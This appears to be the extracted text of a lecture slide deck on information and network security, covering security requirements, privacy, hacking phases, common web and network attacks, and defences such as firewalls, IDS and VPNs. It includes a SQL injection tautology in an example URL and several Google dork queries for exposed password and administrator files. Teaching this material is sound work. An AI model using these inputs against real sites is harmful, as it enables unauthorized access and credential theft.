InformationAndNetworkSecurity
advertisement
Information and Network Security . 1 World History 2 Information Security: Basic concepts 3 Information Protection :Why? • Information - An important strategic and operational asset for any organization • Damages and misuses of information affect not only a single user or an application; they may have disastrous consequences on the entire organization • Additionally, the advent of the Internet as well as networking capabilities has made the access to information much easier 4 Information Security: Requirements Confidentiality Information Security Availability 5 Integrity Information Security: Examples • Consider a payroll database in a corporation, it must be ensured that: – salaries of individual employees are not disclosed to arbitrary users of the database – salaries are modified by only those individuals that are properly authorized – paychecks are printed on time at the end of each pay period 6 Information Security :Examples • In a military environment, it is important that: – the target of a missile is not given to an unauthorized user – the target is not arbitrarily modified – the missile is launched when it is fired 7 Information Security-Main requirements • Confidentiality - it refers to information protection from unauthorized read operations – the term privacy is often used when data to be protected refer to individuals • Integrity - it refers to information protection from modifications; it involves several goals: – Assuring the integrity of information with respect to the original information (relevant especially in web environment) – often referred to as authenticity – Protecting information from unauthorized modifications – Protecting information from incorrect modifications – referred to as semantic integrity • Availability - it ensures that access to information is not denied to authorized subjects 8 Information Security-Additional requirements • Information Quality – it is not considered traditionally as part of information security but it is very relevant • Completeness – it refers to ensure that subjects receive all information they are entitled to access, according to the stated security policies 9 Classes of Threats • Disclosure – Snooping, Trojan Horses • Deception – Modification, spoofing, repudiation of origin, denial of receipt • Disruption – Modification • Usurpation – Modification, spoofing, delay, denial of service 10 Goals of Security • Prevention – Prevent attackers from violating security policy • Detection – Detect attackers’ violation of security policy • Recovery – Stop attack, assess and repair damage – Continue to function correctly even if attack succeeds 11 Information Security-How • Information must be protected at various levels: – – – – The operating system The network The data management system Physical protection is also important 12 Information Security-Mechanisms • Confidentiality is enforced by the access control mechanism • Integrity is enforced by the access control mechanism and by the semantic integrity constraints • Availability is enforced by the recovery mechanism and by detection techniques for DoS attacks – an example of which is query flood 13 Information Security-How Additional Requirements • User authentication - to verify the identity of subjects wishing to access the information • Information authentication - to ensure information authenticity - it is supported by signature mechanisms • Encryption - to protect information when being transmitted across systems and when being stored on secondary storage • Intrusion detection – to protect against impersonation of legitimate users and also against insider threats 14 Data Vs Information • Computer security is about controlling access to information and resources • Controlling access to information can sometimes be quite elusive and it is often replaced by the more straightforward goal of controlling access to data • The distinction between data and information is subtle but it is also the root of some of the more difficult problems in computer security • Data represents information. Information is the (subjective) interpretation of data 15 Data Vs Information • Data Physical phenomena chosen by convention to represent certain aspects of our conceptual and real world. The meaning we assign to data are called information. Data is used to transmit and store information and to derive new information by manipulating the data according to formal rules 16 Data Vs Information • Protecting information means to protect not only the data directly representing the information • Information must be protected also against transmissions through: – Covert channels – Inference • It is typical of database systems • It refers to the derivation of sensitive information from non-sensitive data 17 Inference-Example Name Dittin Smitha Manas Ann Subhash Abhinav Sex Programme M F M F M M CS MBA CS CS MIS CS 18 Units Grade 8 15 16 22 8 10 63 58 70 75 66 81 Inference -Example • Assume that there is a policy stating that the average grade of a single student cannot be disclosed; however statistical summaries can be disclosed • Suppose that an attacker knows that Ann is a female CS student • By combining the results of the following legitimate queries: – Q1: SELECT Count (*) FROM Students WHERE Sex =‘F’ AND Programme = ‘CS’ – Q2: SELECT Avg (Grade Ave) FROM Students WHERE Sex =‘F’ AND Programme = ‘CS’ The attacker learns from Q1 that there is only one female student so the value 70 returned by Q2 is precisely her average grade 19 Information Security- Complete Solution • It consists of: – first defining a security policy – then choosing some mechanism to enforce the policy – finally providing assurance that both the mechanism and the policy are sound SECURITY LIFE-CYCLE 20 Policies and Mechanisms • Policy says what is, and is not, allowed – This defines “security” for the information • Mechanisms enforce policies • Composition of policies – If policies conflict, discrepancies may create security vulnerabilities 21 Assurance • Specification – Requirements analysis – Statement of desired functionality • Design – How system will meet specification • Implementation – Programs/systems that carry out design 22 Management and Legal Issues • Cost-Benefit Analysis – Is it more cost-effective to prevent or recover? • Risk Analysis – Should we protect some information? – How much should we protect this information? • Laws and Customs – Are desired security measures illegal? – Will people adopt them? 23 Human Factor Issues • Organizational Problems – Power and responsibility – Financial benefits • People problems – Outsiders and insiders – Social engineering 24 Key Points • Policies define security, and mechanisms enforce security – Confidentiality – Integrity – Availability • Importance of assurance • The human factor 25 Privacy 26 Motivations • Privacy is an important issue today – Individuals feel • Uncomfortable: ownership of information • Unsafe: information can be misused • (e.g., identity thefts) – Enterprises need to • • • • Keep their customers feel safe Maintain good reputations Protect themselves from any legal dispute Obey legal regulations 27 Privacy- Definition • Privacy is the ability of a person to control the availability of information about and exposure of him- or herself. It is related to being able to function in society anonymously (including pseudonymous or blind credential identification). • Types of privacy giving raise to special concerns: – – – – – Political privacy Consumer privacy Medical privacy Information technology end-user privacy; also called data privacy Private property 28 Data Privacy • Data Privacy problems exist wherever uniquely identifiable data relating to a person or persons are collected and stored, in digital form or otherwise. Improper or non-existent disclosure control can be the root cause for privacy issues. • The most common sources of data that are affected by data privacy issues are: – Health information – Criminal justice – Financial information – Genetic information 29 Data Privacy • The challenge in data privacy is to share data while protecting the personally identifiable information. – Consider the example of health data which are collected from hospitals in a district; it is standard practice to share this only in aggregate form – The idea of sharing the data in aggregate form is to ensure that only nonidentifiable data are shared. • The legal protection of the right to privacy in general and of data privacy in particular varies greatly around the world. 30 Technologies with Privacy Concerns • Biometrics (DNA, fingerprints, iris) and face recognition • Video surveillance, ubiquitous networks and sensors • Cellular phones • Personal Robots • DNA sequences, Genomic Data 31 Approaches in Privacy • Anonymization Techniques – Have been investigated in the areas of networks (see the Anonymity Terminology by Andreas Pfitzman) and databases (see the notion of kanonymity by L. Sweeney) • Privacy-Preserving Data Mining • P3P policies – Are tailored to the specification of privacy practices by organizations and to the specification user privacy preferences • Hippocratic Databases – Are tailored to support privacy policies • Fine-Grained Access Control Techniques • Private Information Retrieval Techniques 32 Privacy Vs Security • Privacy is not just confidentiality and integrity of user data • Privacy includes other requirements: – – – – Support for user preferences Support for obligation execution Usability Proof of compliance 33 Access Control • Exerting control over who can interact with a resource • Includes – Authentication – Authorization – Audit 34 Access Control Models • Discretionary Access Control-Policy determined by the owner of the object – File and Data Ownership, Access rights and permissions • Mandatory Access Control-Allowing access based on existing rules • Role Based Access Control-Access policy determined by the system 35 Network Security 36 Problem of Network Security • The Internet allows an attacker to attack from anywhere in the world from their home desk • They just need to find one vulnerability • A security analyst need to close every vulnerability 37 Common Security Attacks • • • • • • Finding a way into the network Exploiting software bugs, buffer overflows Denial of Service TCP hijacking Packet Sniffing Social Problems and many more 38 Hacker Class • Black Hat – “A person with extraordinary computing skills involved in malicious or destructive activities“ • White Hat – “Person possessing hackers skill using them for defensive purpose aka security analyst” • Gray Hat – “Person who plays a role of black hat and white hat at various times” • Suicide Hackers – “A person committed to bring down critical infrastructure without worrying to face punishments” 39 Triangle Phenomenon • Moving the ball toward security means moving away from functionality and ease of use Functionality Security Ease Of Use 40 Basic steps of Hacking • • • • • Reconnaissance Scanning Gaining Access Retaining Access Covering Tracks 41 Reconnaissance • Reconnaissance is the phase for the attacker to collect and gather as much information as possible about the target of evaluation prior to launching an attack • Types of Reconnaissance – Passive reconnaissance involves acquiring information without directly interacting with the target • eg. search public records, news – Active reconnaissance involves interacting with the target directly by any means • Telephone, email etc. 42 Tools for Reconnaissance • DNS – Nslookup – Whois – ARIN • Trace route – Traceroute – Visualroutetrace • Email – Visual route mail tracker – EmailTrackpro 43 Scanning • Scanning refers to the pre-attack phase when the hacker scans the network for specific information on the basis of information gathered during reconnaissance • Scanning includes – Port scanners – Network mapping – Vulnerability scanners 44 Types of Scanning • • • • • • Network Sweeps Network tracing Port scans OS fingerprinting Version scans Vulnerability scans 45 Tools for Scanning • Nmap • Hping2 • Firework • Nessus • Nikto • Nemessis 46 Gaining Access • Gaining Access refers to the penetration phase. The hacker exploits the vulnerability in the target of evaluation • Gaining of access can be achieved by – Buffer overflows – Denial of services – Session hijacking – Password cracking 47 Tools for Gaining Access • Password Cracking – Dictionary Attack, Brute-force attack : John the Ripper, sniffers • Escalating privilege – Cracking NT/2000 Password • Executing Applications – Host/remote key loggers • Buffer Overflows – Metasploit 48 Tools for Gaining Access • DOS attacks • Trinvo • TFN2K • Social Engineering • Phishing URLs • Email, Telephone 49 Exploit Categories • Server Side • Client Side • Local Privilege Escalation 50 Retaining Access • Retaining Access refers to the phase when the hacker tries to retain the ownership of the system • The hacker has compromised the system • Hackers may harden the system from other hackers as well • Hackers can upload, download or manipulate data, applications or configurations on the owned system 51 Retaining Access • Trojans – Netcat – Loki • Rootkits – Knark, Torn etc 52 Covering Tracks • Covering Track refers to the activities that the hacker undertakes to hide his misdeed • Reasons include the need for prolonged stay, continued use of resources, removing evidence of hacking or avoiding legal action 53 Tools for Covering Tracks • Steganography • Camoflouge • MP3Stego • Tunnelling • HTTPTunnel • 54 Types of attacks • • • • Operating System Attacks Application Level Attacks Shrink Wrap Code Attacks Misconfiguration Attacks 55 Operating System Attacks ‒ ‒ ‒ ‒ Today’s Operating System are complex in nature Operating system run many services, ports, and modes of access and require access tweaking to lock them down. Default installation leaves the OS with large number of open ports and unwanted services running Apply patches, because attackers look for OS vulnerabilities and exploit them to gain access 56 Application Level Attacks • Software Developers are under tight schedule to deliver products on time. • Software applications have tons of functionalities and features • Sufficient time is not there to perform complete testing before releasing products. • Security is often an after thought and usually delivered as add-on component. • Poor or non-existing error checking in applications which leads to Buffer Overflow 57 Shrink Wrap Code Attack ‒ ‒ ‒ When you install an OS , it comes with tons of sample script to make the life of an administrator easy. The problem is not fine tuning or customizing these scripts. This will lead to default code or shrink wrap code attack 58 Mis-configuration Attack − − − − System that should be fairly secure are hacked because they were not configured correctly System are complex and the administrator does not have the necessary skills or resources to fix the problem. Administrator will create the simple configuration that works Remove unwanted services or software. 59 Vulnerability Research • • • • To identify and correct network vulnerabilities. To protect the network from being attacked by intruders. To get information that help to prevent security problems. To know how to recover from network attacks. 60 Vulnerability Research websites • • • • • • • • www.securitytracker.com www.microsoft.com/security www.securiteam.com www.packetstormsecurity.com www.hackerstrom.com www.hackerwatch.org www.securityfocus.com www.securitymagazine.com 61 Penetration Testing • Determine how susceptible your network is to external or internal attacks and access the effectiveness of your safegaurds • Attempt to exploit the weaknesses and demonstrate the effectiveness of the security measures 62 Ground Reality CVE vulnerabilities on average 7 per day − Bugtraq mailing list publishes almost 100 vulnerabilities every week . − Security not a primary consideration while designing software . − Implementations are buggy . − Networks are more open and accessible than ever . − 63 Ground Reality • • • • Mistaken assumptions and unawareness about security Internet Revolution & Crackers at large Intense cut-throat competition between companies The future is fully connected. New technologies rely on networks and computers 64 All About Attacks • • • • • • • • • • Sql Injection Url Scrawler Attacks Using Who is Performing Attacks Traceroute to trace routers ARP Poisioning Man in the Middle (MITM) MAC Flooding Cookie Stealing Attacks Hack Gmail and Yahoo mail accounts in LAN Protocol Stripping Attacks 65 All About Attacks • • • • • • Cross Site Scripting (XSS) Session Fixation Cross Site Request Forgery (CSRF) TCP Session Hijacking Attack Google Hacks Social Engineering Attack 66 What Is SQL Injection ? − − − Sql Injection is a type of security exploit in which the attacker injects SQL query through a web from input box , to gain access to resources, or make changes to data. It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application database backend. Programmers use sequential commands with user input , making it easier for attackers to inject commands. “select * from table where user=‘$v1’ and pass=‘$v2’ ” 67 Exploiting Web Applications • • • • It exploits web applications using client-supplied SQL queries. It enables the attackers to execute unauthorized SQL commands. It also takes advantage of unsafe query in web applications and build dynamic SQL query For Example when users logs onto a web page by using a user name and password for validation, SQL query is used. 68 What you should look for Try to look for pages that allow user to submit data, a log in page, a search page . • Look for HTML pages that use POST or GET Commands • Check the source code of the HTML to get information. • 69 Other Techniques • • • • If input page is not present then check for pages like ASP, JSP, CGI, or PHP Check for URL’s that take parameters. http://www.xyz.com/index.php?id=0 http://www.xyz.com/index.asp?id=blah’ or 1=1-- 70 URL Crawlers • • Definition • A URL Crawler is a computer program that browses the given URL in a methodical automated manner. Utilities • Gather pages and URL from the given web site • Support search engine and used for data mining and so on. • 71 Whois • • Whois is a query/response protocol that is widely used for querying database in order to determine the registrant or assignee of internet resources, such as a domain name, an IP address block or an autonomus system number. Reference:- Wikipedia 72 Whois References • ARIN: http://ws.arin.net/whois • RIPE NCC: http://www.ripe.net/whois/ • APNIC: http://whois.apnic.net • LACNIC: http://whois.lacnic.net • AfriNIC: http://whois.afrinic.net • www.whois.org 73 Traceroute • Traceroute is a network tool which shows the path taken by the packet to reach its destination. It works by using the TTL field of the IP Protocol • Used for network troubleshooting . • Used for information gathering of the network architecture. 74 ARP Poisoning • • • ARP Poisoning is a kind of spoofing in which a forged ARP reply is sent to the original ARP request Updation of target computer cache with a forged entry. The Victim Machine starts sending the packet to the attacker thus allowing attacker to sniff the packets. 75 ARP Poisoning 76 Vulnerable and Non Vulnerable OS • • OS Vulnerable to ARP Spoofing • Windows 98/2000 • Windows NT • Linux • Netgear • AIX 4.3 OS NOT Vulnerable to ARP Spoofing • Sun Solaris 77 Man In The Middle (MITM) Man in the middle is a type of a attack in which the attacker forms independent connection with the client and the server and is transparent to each of them. 78 Man In The Middle (MITM) − Possible Causes Of Man In The Middle Attack – ARP Poisoning – DNS poisoning – Route Mangling – Proxy 79 Once In The Middle • • • • It is the easiest attack to launch since all the packets transit through the attacker All the “plain text” protocols are compromised (the attacker can sniff user and password of many widely used protocols such as telnet, ftp, http) It is transparent to the victims on either side. It can issue its own certificate to form secure connection (HTPS). 80 Consequences • • • • • Attacker can add packets to already established connection The attacker can modify the sequence number and keep the connection synchronized while injecting packets If the mitm attack is “proxy attack” it is even easier to inject. The attacker can modify the payload by recalculating the checksum. Can create filters on the fly 81 MAC Flooding Attack • • • • • This attack targets switches . Flood the switch with fake MAC addresses. CAM is full with fake MAC address Thus switch bleeds the traffic out Switch starts behaving like a HUB 82 MAC Flooding Attack Attacker Does The MAC Flooding Switch Bleeds The Traffic Out 83 What Is A Cookie ? • • • • Short piece of text generated during web activity and stored in the user’s machine for future references. Instructions for reading and writing cookies are coded by website authors and executed by user browsers. Developed for user convenience to allow customization of sites without need for repeating preferences Used as an identity of the user using the web server. 84 Cookie Facts • • • • Most cookie stored just 1 data value A cookie may not exceed 4Kb in size Browsers are preprogrammed to allow a total of 300 cookies, after which automatic deletion based on expiry date and usage. Cookies have 3 key attributes: name, value expiry date. 85 Cookie Algorithm Start : On Page Load Read Cookie NO Use Cookie Info to customize /login etc YES Is Cookie Empty Write new cookie prompt for info if necessary Continue Loading Page Update cookie 86 Cookie Stealing • • • Cookie can be steeled through sniffing of the traffic By using some scripts that will execute on client browser thus revealing the cookie information to the attacker. By using Man in the Middle technique. 87 Using Cookie Editor For Hacking • • • Cookie Editor available as an Add-On of mozilla Helps in viewing cookies Cookie Editor helps in updating, deleting and modifying the present cookies. 88 Protocol Stripping Attack • • • • • • • Why hackers strip a protocol ? Can we decrypt SSL encryption ? Till date no mechanism has been devised Does this means HTTPS protocol is secure? Hackers don’t think so. Can HTTPS be tricked? Definitely “YES” 89 Positive Browsers 90 Negative Browsers 91 Gmail Login Page 92 Gmail Login Page 93 Yahoo Login Page 94 Yahoo Login Page 95 Facebook Login Page ? 96 Facebook Login Page ? 97 What’s Going On Behind ? HTTP Host A HTTPS Attacker 98 Host B Cross Site Scripting Attack (XSS) Cross site scripting occurs when an attacker uses a web application to send malicious code, like java script ‒ Stored XSS ‒ Stored attacks are those where the injected code is permanently stored in the target server data base ‒ Reflected XSS ‒ Reflected attacks are those where the injected code takes another route to the victim 99 Consequences of XSS • Disclosure of the user’s session cookie allows an attacker to hijack the user’s session and take over the account. • In XSS end user files are disclosed, trojan horse are installed, the user is redirected to some other page and the presentation of the content is modified. • Web servers, application servers, and web application environments are susceptible to cross site scripting. 100 Session Fixation Attack In session fixation attack the user fixes the session key, even before the user logs into the server thus eliminating the need to steal the session key and helps the attacker to take over the victims account. Steps For Session Fixation Attack : ‒ Session Setup ‒ Session Fixation ‒ Session Entrance 101 Session Fixation Attack 102 TCP Session Hijacking • TCP Session hijacking is a hacking tech. That uses spoofed packets to take over the connection b/w a victim and a target machine. • The victim connection hangs, and the hacker is then able to communicate with the host’s machine as if the attacker is the victim. • To launch the TCP session hijacking the attacker must be on the same network as the victim. 103 TCP Session Hijacking SYN ISN 4000 SYN ISN 5000 / ACK 4001 ACK 5001 SEQ 4000 DATA 128 ACK 4129 SEQ 4129 DATA 91 ACK 4220 SEQ 4220 DATA 10 ACK 4230 SEQ 4230 DATA 512 SEQ 4220 DATA 145 104 CROSS SITE REQUEST FORGERY This attack forces another user’s browser to do something on attacker’s behalf CSRF attacks are effective in number of situations • The victim has an active session on the target site • The Victim is authenticated via HTTP auth on target site • If the user is an logged in as an administrator on a website, the attack can be used to escalate privilege. 105 TYPES OF CSRF Classical CSRF-In the course of web browsing the target user encounters a request from a malicious site or location that makes a request on behalf of the user to a site the user is already authenticated to. CSRF seeks to use victims cookie to force victim to execute a trade without his knowledge or consent. Dynamic CSRF-In a “dynamic” CSRF scenario attacker creates a customized, per-request forgery, based on each user’s session specific information, including valid CSRF tokens and other parameters specific to 106 the user’s session. Google Hacks • • • • • • • • inurl: adminlogin.php “login: *” “password= *” filetype:xls intitle:"Live View / – AXIS" intitle:"index.of.personal" intitle:index.ofadministrators.pwd intitle:"index of" intext:connect.inc filetype:ini lot of google hacking keywords can be referred 107 from google hacking database (GHDB). Social engineering • Victim is tricked to reveal confidential information • A non technical attack • Still more dangerous and powerful from most of the complex technical attacks. • Does not require technical skills 108 Perimeter Security 109 Firewall • S/w and/or h/w designed to block unauthorized access while permitting authorized communications • Configured to permit, deny, encrypt, decrypt based on set of rules and other criteria. • Helps to block all incoming communications from unauthorized sources. 110 Firewall 111 Firewall Implementation • Rules at Router • Linux Network layer firewall – Linux as Firewall Platform • • • • Robust kernel-based filtering Tested platform Performance Cost – Packet filtering • iptables 112 IDS • Intrusion Detection System’ is a security system that detects malicious activities on computer systems and networks 113 Types of IDS IDS Host Based Signature Based Network Based Anomaly based Signature Based 114 Anomaly Based IPS • N/w security appliances that monitor network and/or system activities for malicious activity • Functions: – – – – Identify malicious activity Log information Attempt to stop the activity Report the activity 115 IPS • Network-based intrusion prevention system (NIPS): monitors the entire network for suspicious traffic by analyzing protocol activity. • Network behavior analysis (NBA): examines network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware, and policy violations. • Host-based intrusion prevention system (HIPS): monitors a single host for suspicious activity by analyzing events occurring within that host. 116 IPS • Detection Methods – Signature based Detection – Statistical anomaly Based detection – Stateful Protocol Analysis Detection 117 VPN • VPN is a connection that is established over an existing “public” or shared infrastructure using encryption or authentication technologies, to provide remote offices or individual users with secure access to their organization’s network. 118 VPN • A means of carrying private traffic over a public network • Often used to connect two similar or different private networks, over a public network, to form a virtual network • Aims to avoid an expensive system of owned or leased lines that can be used by only one organization • The goal of a VPN is to provide the organization with the same secure capabilities but at a much lower cost 119 VPN Connectivity Overview Courtesy http://en.wikipedia.org/wiki/VPN 120 VPN Configurations • Host-to-Host • Host-to-Gateway • Gateway-to-Gateway 121 VPN methodology • The basic concept behind a VPN is securing a communication channel with encryption • Communication can be safeguarded through encryption at many different layers of the networkApplication, Transport, Network & Data link layers 122 References • • • E. Bertino, R. Sandhu “Database Security – Concepts, Approaches, and Challenges”, IEEE Transactions on Dependable and Secure Computing, 2(1), 2005. L. Sweeney, “k-Anonymity: a Model for Protecting Privacy” http://privacy.cs.cmu.edu/people/sweeney/cv.html#publications A. Pfitzman et al. “Anonymity, Unobservability, Pseudonymity and Identity Management – A Proposal for Terminology”, http://dud.inf.tu-dresden.de/Literatur_VI.shtml • • • http://homes.cerias.purdue.edu http://www.redbooks.ibm.com/redpapers/pdfs/redp4397.pdf http://en.wikipedia.org 123 Thank You dittin@cdac.in 124
